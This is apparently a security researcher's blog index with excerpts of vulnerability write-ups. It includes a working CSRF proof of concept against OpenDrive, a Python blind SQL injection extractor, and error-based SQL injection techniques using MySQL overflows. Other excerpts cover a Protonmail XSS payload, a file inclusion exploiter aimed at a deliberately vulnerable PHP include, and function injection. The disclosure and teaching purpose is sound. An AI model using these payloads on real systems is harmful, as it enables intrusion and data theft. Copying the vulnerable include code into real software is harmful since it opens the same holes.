Web Application Security

Pwning OpenDrive Users

After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.

If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.

XSRF in Creating Groups

View post on imgur.com

[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.opendrive.com/ajax", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
(more…)

Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)

(more…)

Error Based SQL Injection Using EXP

Overview

This is another overflow in the DOUBLE data type in MySQL I found. You can refer to my previous post on BIGINT Overflow Error based injections if you want to understand exploiting overflows in extracting data. Also the queries are similar to my previous post. When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

mysql> select exp(709);

+-----------------------+

| exp(709)              |

+-----------------------+

| 8.218407461554972e307 |

+-----------------------+

1 row in set (0.00 sec)



mysql> select exp(710);

ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp is the opposite of the ln and log functions of MySQL. If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to: $latex e \approx 2.71828183&bg=FFFFFF&s=1$ .

$latex ln(15) = log_ {e} (15) = 2.70805020110221 &bg=FFFFFF&s=1$
(more…)

BIGINT Overflow Error Based SQL Injection

Overview

I was interested in finding out new techniques that we can use in extracting data via MySQL errors. This is a detailed write-up which will make you understand how I made these queries. When we look how MySQL handles integers I was interested in causing overflows. This is how MySQL stores integers.

View post on imgur.com


(Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html)
These overflow errors will cause in MySQL versions 5.5.5 and above only. In below versions integer overflows would result in a silent wraparound.
The data type BIGINT is of 8 bytes in size which means it’s of 64 bits. If we take the maximum signed value of a BIGINT its “0b0111111111111111111111111111111111111111111111111111111111111111”, “0x7fffffffffffffff”, “9223372036854775807” in binary, hex and decimal respectively. Once we evaluate numerical expressions on this value like adding will cause a “BIGINT value is out of range” error. 

mysql> select 9223372036854775807+1; 

ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'

(more…)

Protonmail Stored XSS

I found out that attachments containing Javascript or HTML will get executed in the browser once you open in a new tab. The attachment can be anything simple like .html, .svg containing our payload.

View post on imgur.com


[code language=”html”]
<html>
<script>
prompt(‘XSS by Osanda Malith’);
</script>
</html>
[/code]
(more…)

LFi Freak – An Automated File Inclusion Exploiter

I am sure you know about exploiting file inclusion vulnerabilities. In file inclusion situations in common we can read files arbitrarily in the system or remotely depending on the permissions. In PHP environments commonly we poison the log files or inject malicious PHP into the user agent header and load the “/proc/self/environ” file. However when we encounter file inclusion situations in PHP environments we can use the in-built PHP wrappers to make our exploitations much easier or perhaps bypass existing filters.

There are lot of LFI exploitation tools available but I’ve written this tool mainly focusing on the usage of “php://input”, “php://filter” and “data://” methods.  Even though the title explicitly conveys “LFI Freak” this can be used for RFI vulnerabilities as well. This tool is written in Python 2.7 and I have included binaries for both Windows and Linux systems. If you are running from the source or want to modify this, you need the BeautifulSoup library.

Here is a small walkthrough of the features of the tool.

To test for local or remote file inclusions you can use the option one “Automated testing”. I am using DVWA in here. To test this tool create a small vulnerable file.
[code language=”php”]
<?php
echo "File included: ".$_REQUEST["page"]."<br>";
$file = $_REQUEST["page"];
include $file;
?>
[/code]
(more…)

Dynamic Function Injection in PHP

In PHP we can pass arguments to a function dynamically during runtime. For example have look at this example.

View post on imgur.com

I have used call_user_func_array() to pass the arguments to the function. The syntax would be:
[code language=”php”]
call_user_func_array(function, param_arr)
[/code]
Since I have used $_GET we can pass the function and its arguments during runtime.

http://localhost/?func=user&args[]=Osanda&args[]=secret&args[]=abc@abc.com

(more…)

Hackxor SQL Injection

You can download the complete challenge VM from here. They have provided the online version of first two levels. I was interested in having a look at it. http://cloaknet.csc.kth.se:8080/proxy.jsp

There is a login page and our goal is to extract all the usernames and passwords from the database.

View post on imgur.com

If you try injecting the login form, none of the injections would work. But there was this text called “No account?” when you click it you get this message.

View post on imgur.com

After logging with demo:demo we are taken to “proxypanel.jsp” which displays source, target and date.

View post on imgur.com


(more…)

My ShellShockings

While I was suffering the interwebs my eyes caught a perl script which prints out the environment variables. For example something like this.
[code language=”perl”]
use CGI;

$cgi = new CGI;

for $key ( $cgi->param() ) {
$input{$key} = $cgi->param($key);
}

print qq{Content-type: text/html

<html><head></head><body>
};

foreach $key (sort (keys %ENV)) {
print $key, ‘ = ‘, $ENV{$key}, "<br>\n";
}

for $key ( keys %input ) {
print $key, ‘ = ‘, $input{$key}, "<br>\n";
}

print qq{<form METHOD=POST><input type="submit" value="Post Request">
<input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get Request ">
<input name="getfield" ></form>};

print qq{</body></html>};
[/code] >